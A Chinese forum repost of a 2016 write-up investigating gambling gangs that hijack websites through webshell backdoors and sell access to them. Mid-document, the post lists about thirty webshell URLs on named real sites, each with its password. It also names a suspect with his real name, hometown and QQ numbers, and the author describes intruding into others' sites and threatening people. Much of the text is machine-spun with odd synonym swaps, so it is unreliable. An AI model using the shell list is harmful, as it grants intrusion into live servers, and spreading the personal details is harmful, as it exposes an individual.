tw4ld6 发表于 2024-10-3 10:03:14

中国最大的webshell后门箱子调查,所有公开大马全军覆没


    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">T00ls管理团队注:</strong></p><strong style="color: blue;">本文于2016年10月31日下午15点多投稿至T00ls管理邮箱,<span style="color: black;">针对</span><span style="color: black;">文案</span>内容<span style="color: black;">咱们</span>持部分肯定部分质疑态度,某些黑产团队的不择手段<span style="color: black;">咱们</span>是<span style="color: black;">认识</span>部分的,<span style="color: black;">然则</span>是不是如文中所写的<span style="color: black;">所说</span>“中国最大”,<span style="color: black;">咱们</span><span style="color: black;">暗示</span>观望。<span style="color: black;">另一</span>声明下:不排除这些团队有部分人<span style="color: black;">隐藏</span>在T00ls偷学技术,<span style="color: black;">然则</span>T00ls官方与这些毫无联系。<span style="color: black;">期盼</span><span style="color: black;">相关</span><span style="color: black;">分部</span>能彻底查一查,这些黑产团队才是网络安全技术发展的最大敌人。</strong>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><a style="color: black;"><img src="http://mmbiz.qpic.cn/mmbiz_png/Wqr9SokRcTVkfjibzHkaXEkX2iaQvsVCdmTeJLzSAhDmBbtNOnmh8849JOQ0SMSqCWMofH9MtgHAeNmXjSl60AsQ/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></a><span style="color: black;"><strong style="color: blue;">×一.起因</strong></span>对这件事情的起因是某天我日了一个大战(耗时很久的),<span style="color: black;">次日</span>进webshell时就<span style="color: black;">发掘</span>,当前目录<span style="color: black;">显现</span>了新的后门,仔细一查,<span style="color: black;">发掘</span>是BC团伙干的,网站被全局劫持黑帽程序如下代码</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><a style="color: black;"><img src="http://mmbiz.qpic.cn/mmbiz_png/Wqr9SokRcTVkfjibzHkaXEkX2iaQvsVCdmKKcoEjRkfq2m2CiaS8vAcsns7FBT0Oc8qXlm1xzOBsLVubmQW7eSjUg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></a></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><a style="color: black;">https://www.so.co</a>m/s?q=%E5%A8%B1 ... newhome&amp;adv_t=d</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">看上去是针对360的,<span style="color: black;">经过</span>360去搜索site网站赌博<span style="color: black;">关联</span>的关键字<span style="color: black;">显现</span>的结果我惊呆了!!!!居然非常多的站被劫持,<span style="color: black;">况且</span>其中<span style="color: black;">包含</span>我渗透测试的不少站,看上去就像360自己<span style="color: black;">掌控</span>的排名<span style="color: black;">同样</span>,其实是<span style="color: black;">违法</span>份子利用了360的算法漏洞。<span style="color: black;">经过</span>收录时间<span style="color: black;">发掘</span>在2014年<span style="color: black;">起始</span><span style="color: black;">显现</span>的,<span style="color: black;">亦</span><span style="color: black;">便是</span>说这个问题<span style="color: black;">已然</span>存在了<span style="color: black;">数年</span>之久,<span style="color: black;">迄今</span>才暴露出来。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">接下来我就开展了所有疑问的调查,<span style="color: black;">由于</span>这些东西被利用对社会影响实在太大,<span style="color: black;">不仅</span>我是<span style="color: black;">独一</span>的受害者,而是这个安全圈子的所有人。</p><span style="color: black;"><strong style="color: blue;">×二.调查</strong></span><span style="color: black;"><strong style="color: blue;">
            <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">找到幕后团伙</p>
            <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">查大马问题</p>分析团伙的后门特征
      </strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">1.我对我手里的shell进行了一遍梳理,<span style="color: black;">首要</span>是对后门进行新的<span style="color: black;">位置</span>修改,原来的后门<span style="color: black;">位置</span>放上了js代码,其中记录的是<span style="color: black;">关联</span>指纹信息,以及各大网站的json获取。此时<span style="color: black;">便是</span>静静的等待。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2.我对大马又进行了一遍分析,所有代码读烂了<span style="color: black;">亦</span>没任何问题,<span style="color: black;">同期</span>对马进行了抓包分析,<span style="color: black;">无</span>任何<span style="color: black;">外边</span>请求,<span style="color: black;">由于</span><span style="color: black;">始终</span>没<span style="color: black;">发掘</span>问题,我特意进行了长达<span style="color: black;">1星期</span>的数据包监控,还是<span style="color: black;">无</span>任何结果。<span style="color: black;">此时</span>候就非常纳闷,既然马<span style="color: black;">无</span>问题,<span style="color: black;">为何</span>人家<span style="color: black;">能够</span>获取到我的所有后门,电脑被入侵?我的网络环境除了http<span style="color: black;">不可</span>做任何协议请求,而我的后门都在这台linux里<span style="color: black;">保留</span>,这点<span style="color: black;">亦</span><span style="color: black;">能够</span>排除。只好再想想是不是哪里疏忽了。</p>3.被团队劫持过的站,我都<span style="color: black;">检测</span>了一遍,<span style="color: black;">每一个</span>站的所有文件创建时间都会被<span style="color: black;">她们</span>更新到入侵时间,这刚好符合了特征,<span style="color: black;">亦</span><span style="color: black;">便是</span>刚被<span style="color: black;">她们</span>入侵过的站<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/Wqr9SokRcTVkfjibzHkaXEkX2iaQvsVCdm58hq0eIRaYhuqypchKWfplJWB0ib5SZaoZ53REWhibjF5x0hLxZvOrcg/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;">
    </p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">如图特征,几乎<span style="color: black;">每一个</span>站被入侵后所有创建时间都会更新一次</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">之后对<span style="color: black;">她们</span>自己的后门进行了采集样本,新的<span style="color: black;">发展</span><span style="color: black;">显现</span>了,一共<span style="color: black;">发掘</span>2波<span style="color: black;">区别</span>的团伙,但<span style="color: black;">运用</span>的大马均为一类。看附件1</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">我对他的马进行<span style="color: black;">认识</span>密审计后<span style="color: black;">发掘</span>了<span style="color: black;">她们</span>自己记录大马后门的箱子<span style="color: black;">位置</span>api.fwqadmin.com,暂时收集着,此时…<span style="color: black;">由于</span>有了新的线索,<span style="color: black;">因此</span>后面再对这个进行渗透。</p><span style="color: black;"><strong style="color: blue;">×三.<span style="color: black;">发展</span></strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">经过两天的等待,<span style="color: black;">最终</span>得到了团伙的指纹信息以及QQ号,<span style="color: black;">而后</span>我就开启大神模式,进行了一顿乱射后,<span style="color: black;">能够</span>确认此人真实信息了(圈内叫老袁),之后我申请了一个小QQ,匿名的加了<span style="color: black;">有些</span>bc导航网站上的qq,问了好几个人,可能<span style="color: black;">由于</span><span style="color: black;">她们</span>是同行,我一问大<span style="color: black;">都数</span>都认识,后来我以我<span style="color: black;">亦</span>是做BC的名义和<span style="color: black;">她们</span>进行深度沟通,沟通中透露这团伙的shell都是收购来的,<span style="color: black;">一月</span>收入水平在几百万人名币,<span style="color: black;">是不是</span>真实就不得而知了。<span style="color: black;">日前</span>基本<span style="color: black;">能够</span>确认我的判断<span style="color: black;">无</span>错误,老袁<span style="color: black;">便是</span><span style="color: black;">此刻</span>要查的<span style="color: black;">目的</span><span style="color: black;">独一</span>的线索。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">我对被团伙做劫持的所有站进行了采集,还有<span style="color: black;">转</span>到<span style="color: black;">她们</span>导航的域名。<span style="color: black;">首要</span>对<span style="color: black;">哪些</span>不是我的站进行了渗透入侵采集后门样本,看到里面有个和我类似的大马,<span style="color: black;">然则</span>核心变量结构不<span style="color: black;">同样</span>,我下载回来进行审计抓包<span style="color: black;">一样</span>没问题,后来对比特征,<span style="color: black;">发掘</span>大马请求的POST参数都是<span style="color: black;">同样</span>的gopwd=<span style="color: black;">秘码</span>&amp;godir=
      <span style="color: black;">这般</span>的特征相同,马都没<span style="color: black;">反常</span>,<span style="color: black;">此时</span>候初步判断是上层网络<span style="color: black;">显现</span>问题,<span style="color: black;">经过</span>流量提取大马特征的<span style="color: black;">位置</span>,<span style="color: black;">倘若</span>真是<span style="color: black;">这般</span>就太可怕了。
    </p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">我联系到老袁了,和他进行了<span style="color: black;">有些</span>盘问的沟通,感觉到他很害怕,他说别搞他,他以前做诈骗的。后来发了<span style="color: black;">有些</span>shell<span style="color: black;">位置</span>给我来买好我,如下列表:</p><span style="color: black;">下面是 星际团队的</span><a style="color: black;">http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&amp;f=k</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">HyhbokskjGrsjhjM8hsL_hgshgK</p><a style="color: black;">http://www.212200.com/mocuz/down ... e.php?1=2&amp;Z=Opm</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; Hys7sa5wrKKO00GSBtashras28asNNmsn18</p><a style="color: black;">http://www.dailiba.com/about/index.php</a>?v=1
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Tmbdcuu123uualltop</p><a style="color: black;">http://www.chinaunix.net/mysql/tmp/hoem.php?1=1&amp;f=k</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HyhbokskjGrsjhjM8hsL_hgshgK</p><a style="color: black;">http://domarketing.org/phpsso_se ... ons/index.php</a>?v=2ss
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ytsadAskLs27ssJsjdasd2sS </p><a style="color: black;">http://www.baby-edu.com/member/a ... /box/index.php?v=qw</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ytsadAskLs27ssJsjdasd2sS</p><a style="color: black;">http://www.hongze365.com/data/avatar/1/f</a>/1.g if?1=2&amp;GSW=Curry
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; TTrsfsdh748jsusyKKOystw889sbct </p><a style="color: black;">http://www.xiashanet.com/Head_Fo ... ?1=2&amp;BAT=HEHEDE</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 77iasyw00aUUSImmsb64682301jMM!!!Qko</p><a style="color: black;">http://www.h</a>bmykjxy.cn/2015/0106/4589.php?1=2&amp;GSW=Curry
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; TTrsfsdh748jsusyKKOystw889sbct</p><a style="color: black;">http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&amp;f=k</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">HyhbokskjGrsjhjM8hsL_hgshgK</p><a style="color: black;">http://www.dailiba.com/about/index.php?v=1</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Tmbdcuu123uualltop</p><a style="color: black;">http://www.hubeifc.com/phpcms/mo ... mentl_api.class.php</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; UTF8</p><a style="color: black;">http://domarketing.</a>org/phpsso_se ... ons/index.php?v=2ss
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ytsadAskLs27ssJsjdasd2sS</p><a style="color: black;">http://www.huse.edu.cn/phpsso_se ... condif.inc.php?v=sd</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ytsadAskLs27ssJsjdasd2sS</p><a style="color: black;">http://ww</a>w.xiashanet.com/Head_Fo ... ?1=2&amp;BAT=HEHEDE
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 77iasyw00aUUSImmsb64682301jMM!!!Qko</p><a style="color: black;">http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&amp;GSW=Curry</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">TTrsfsdh748jsusyKKOystw889sbct</p><a style="color: black;">http://www.hongze365.com/data/avatar/1/f/1.g if?1=2&amp;GSW=Curry</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; TTrsfsdh748jsusyKKOystw889sbct</p><a style="color: black;">http://bbs.fish3000.com/mobcent/ ... .php?1=2&amp;</a>TD=SAS
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; UUys78tasdRhasd00iasdyTGGgahs</p><a style="color: black;">http://bbs.dqdaily.com/uc_server ... hp?1=2&amp;sha=shan</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 7yJJN730%1&amp;uqYYqwhkkasII17vcxQ1mzaPQhn8!P</p><a style="color: black;">http://www.aquasmart.c</a>n/member/f ... end.php?1=1&amp;f=k
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HyhbokskjGrsjhjM8hsL_hgshgK</p><a style="color: black;">http://www.yangji.com/member/edi ... ?1=2&amp;BAT=HEHEDE</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; 77iasyw00aUUSImmsb64682301jMM!!!Qko</p><a style="color: black;">http:/</a>/www.shenma66.com/nvzhubo/ ... hiboshipin/inde.php
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 7yhaw1woAksmjh892jsasd1sajg</p><a style="color: black;">http://www.shenma66.com/nvzhubo/ ... hiboshipin/inde.php</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">7yhaw1woAksmjh892jsasd1sajg</p><a style="color: black;">http://bbs.taisha.org/pms/data/t ... pl.php?baidu=Google</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; erk12hj3nfher71h3j4k132bnnebr3hg4134</p><a style="color: black;">http://www.168w.cc/api/map/baidu/baidu.php?1=1&amp;f</a>=k
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HyhbokskjGrsjhjM8hsL_hgshgK</p><a style="color: black;">http://www.dibaichina.com/goldca ... ?1=1&amp;baidu=.com</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; Tmbdcuu123uualltop</p><a style="color: black;">http://www.ijcz.cn/module/brandj ... p?1=2&amp;BK=ManUt</a>d
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; YIasdwj78954qwtyVVJsarwhahuyrwvsllps2</p><a style="color: black;">http://www.xiashanet.com/Head_Fo ... ?1=2&amp;BAT=HEHEDE</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 77iasyw00aUUSImmsb64682301jMM!!!Qkos</p><a style="color: black;">http://www.hotpoll.com.c</a>n/i/index.php?v=111
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&nbsp; &nbsp;heiheideheihei</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">星际团队是什么鬼?难不成又是做bc的?我深入问了他之后,才<span style="color: black;">发掘</span>,这些shell都是另一个做bc的,说是bc圈子最大的团伙,<span style="color: black;">此时</span>候感觉水越来越深,又有了新方向,对这件事越来越有兴趣了,<span style="color: black;">瞧瞧</span>又是些什么人。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">不外</span><span style="color: black;">此刻</span>我的<span style="color: black;">目的</span>还在“老袁”身上,我得找到卖他shell的人,后来恐吓之后告诉了我,我<span style="color: black;">亦</span>叫他<span style="color: black;">供给</span>了交易证据。我会放到后面取证部分。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">虽然说</span>有了shell卖家的联系方式,可是迟迟没添加上。<span style="color: black;">此时</span>候我又采取了另一种思路,钓鱼取证,老<span style="color: black;">招数</span>,还是在大马<span style="color: black;">位置</span>上js
      json,上面贴了几段字《add me email:xxx@xxx.com I will give you all
      webshell》让老袁发给让他主动联系我,后来果真<span style="color: black;">拜访</span>了几个webshell的<span style="color: black;">位置</span>,<span style="color: black;">同期</span><span style="color: black;">亦</span>抓取到了真实pc指纹以及代理的指纹,他的qq名为:一切安好,之后他主动联系到我<span style="color: black;">经过</span>沟通他说我是星际团队的吧,收到你发的邮件了,<span style="color: black;">此时</span>候我就很好奇了,莫非星际团队<span style="color: black;">亦</span>找到他了?<span style="color: black;">而后</span>来恐吓我,说要抓你们,<span style="color: black;">已然</span>调查了一年了,<span style="color: black;">此时</span>候我心一想,水真深,查来查去的到底是谁在查谁呢。<span style="color: black;">不外</span>他肯定是瞒<span style="color: black;">不外</span>我的,<span style="color: black;">由于</span>我<span style="color: black;">亦</span>有了他卖shell的证据,<span style="color: black;">不外</span>意想不到的是他说他<span style="color: black;">背面</span>都是省厅的人,你以为这些shell都是怎么来的?都是国家<span style="color: black;">设备</span>提取的,我勒个去,国家会干这种事吗?国家提取网站记录我是信,isp<span style="color: black;">保存</span>日志<span style="color: black;">亦</span>是1年,至于批量提取全国网站<span style="color: black;">拜访</span>特征拿出来卖这我不信了,要么<span style="color: black;">便是</span>黑客入侵到了运营商有权限去提取。经过了<span style="color: black;">有些</span>沟通后,他居然<span style="color: black;">始终</span>说我是星际团队,就把我拉黑了,后来我就主动加他,说你是河北的吧我<span style="color: black;">已然</span>有你犯罪证据了,他就怕了主动加我认怂,还发了打包好的webshell给我,<span style="color: black;">此时</span>候我又惊呆了,这简直是逆天的节奏,居然有上万个webshell和国内所有cms的后台登录<span style="color: black;">秘码</span>,其中<span style="color: black;">包含</span>dedecms
      discuz wordpress emlog ecshop empire jieqi phpmyadmin uchome ucenter
      php168等几乎是全国所有cms都存在,<span style="color: black;">况且</span>每种的数量去重复都在上万条,我会上传一部分在附件。他说他<span style="color: black;">背面</span>的人的有几十万的discuz后台登录账户<span style="color: black;">秘码</span>,我测试了他发我的<span style="color: black;">有些</span>后台,均<span style="color: black;">能够</span>登录,其中信息<span style="color: black;">包含</span>登录的fromhash
      uid 用户名 <span style="color: black;">秘码</span> 安全问题 安全答案,<span style="color: black;">况且</span>都是前一天的。。。</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">到底是什么东西能记录如此多东西还<span style="color: black;">无</span>一点<span style="color: black;">反常</span>。我看了其中<span style="color: black;">亦</span>有我<span style="color: black;">运用</span>过大马的<span style="color: black;">非常多</span>站,里面还有上万条webshell,其中有<span style="color: black;">海量</span>我的站,还有<span style="color: black;">海量</span><span style="color: black;">各样</span>类型的大马,和<span style="color: black;">区别</span><span style="color: black;">秘码</span>,看样子并非我一个人受害,我进行特征匹配出来,大概有不少于上百人的大马<span style="color: black;">区别</span>特征。<span style="color: black;">况且</span>他发我的只是很小一部分,叫我给他钱才给我<span style="color: black;">更加多</span>。<span style="color: black;">这般</span>一想他手里的资源都有几十万条了吧。他说他后面的人是技术团队,还有<span style="color: black;">各样</span>0day,是给国家干的,手里有全国的webshell,<span style="color: black;">倘若</span>真是他说的<span style="color: black;">这般</span>资源<span style="color: black;">为何</span>出<span style="color: black;">此刻</span>他<span style="color: black;">这儿</span>了还拿出来卖,很<span style="color: black;">显著</span>是撒谎怕我查他。接下来的调查还在继续。</p>经过几天的分析,这波数据和以前wooyun<span style="color: black;">揭发</span>的出来的九宫格(<span style="color: black;">大众</span><span style="color: black;">能够</span>回溯一下2013年的<a style="color: black;">http://www.dedebox.com/core/centerxxxxx.php</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">)是<span style="color: black;">同样</span>的,我对当时的数据<span style="color: black;">亦</span>进行打包分析了<span style="color: black;">发掘</span>这波shell里面还存在部分的重复数据,而当前这个大马和当时九宫格的登录参数特征<span style="color: black;">亦</span>一至基本都是Spider
      PHP
      Shell(SPS-)这款代码的<span style="color: black;">基本</span>上修改的,<span style="color: black;">亦</span><span style="color: black;">便是</span>说除了后门本身这伙人是<span style="color: black;">经过</span>其他<span style="color: black;">途径</span>来提取的<span style="color: black;">海量</span>webshell,之后<span style="color: black;">经过</span>webshell去运行了记录后台数据的代码写入内存中僵死代码,保持着只要不换服务器就常年不死的状态,这<span style="color: black;">亦</span>还是猜想,<span style="color: black;">由于</span>后台数据里面有些站的确是九宫格重复的,<span style="color: black;">倘若</span>是九宫格后门的话我就有新方向可查了,以上是我进行的大致分析和调查过程。下面我就不描述过程,过程太<span style="color: black;">繁杂</span>,耗时<span style="color: black;">亦</span>几个月,<span style="color: black;">触及</span>到的人员都有可顺藤摸瓜的信息,就直接<span style="color: black;">供给</span>数据记录以及取证结果,和交给警方的完<span style="color: black;">成为了</span>。</p><span style="color: black;"><strong style="color: blue;">×四.取证</strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">在中国<span style="color: black;">此刻</span>怎么可能还有如此猖狂的黑产呢(除了电信诈骗),都必须绳之以法。</p><span style="color: black;">这几个是团伙一(老袁)<span style="color: black;">转</span>到的域名</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">116305.net</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">559160.net</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">618309.net</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">786077.net</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">551809.com</p><a style="color: black;">www.919808.net</a><a style="color: black;">www.226830.com</a>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">均为同一团伙的,只是域名<span style="color: black;">区别</span>,其中劫持代码里面的ip都是<span style="color: black;">同样</span>107.182.228.74,只是<span style="color: black;">每一个</span>站<span style="color: black;">转</span>到<span style="color: black;">区别</span>的域名分散<span style="color: black;">危害</span>罢了,看得出来很老练</p><span style="color: black;">这几个是模拟蜘蛛抓取劫持内容的bc logo<span style="color: black;">照片</span><span style="color: black;">位置</span>的ip</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">210.126.27.70</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">pic.root1111.com</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">58.96.179.132</p>104.202.66.226<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">此团伙工作环境ip,都在马来西亚(时间在10月9-号到10月26号以内的)</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-26 13:00:01 ( IP 14.192.210.34 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-26 13:20:09 ( IP 103.6.245.143 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-26 13:00:25 ( IP 175.141.34.101 ) 马来西亚Windows NT 6.3, Chrome 50.0.2661,QQBrowser 9.5.9244, 1920×1080</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-24 13:59:17 ( IP 175.136.41.251 ) 马来西亚Windows 7 &amp; 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-25 14:28:11 ( IP 175.143.101.241 ) 马来西亚 Windows NT 10.0, Chrome 47.0.2526, 1920×1080</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2016-10-26 13:20:09&nbsp;&nbsp;( IP 103.6.245.143 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">14.192.211.116&nbsp;&nbsp;马来西亚</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">14.192.211.223 马来西亚</p>175.138.234.137马来西亚<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">工作PC指纹(分析此团伙有5个人):</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows NT 6.3, MSIE 11.0,QQBrowser 9.5.9244, 1920×1080, 224 色</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows 7 &amp; 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows NT 10.0, Chrome 47.0.2526, 1920×1080</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows XP, MSIE 6.0, 1126×800</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Windows Server 2003, Chrome 49.0.2623, 1920×1080</p>Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">此团伙首领信息</span></strong>
    </p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">QQ 474304849 641075512</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">真实姓名:袁立 重庆人</p>
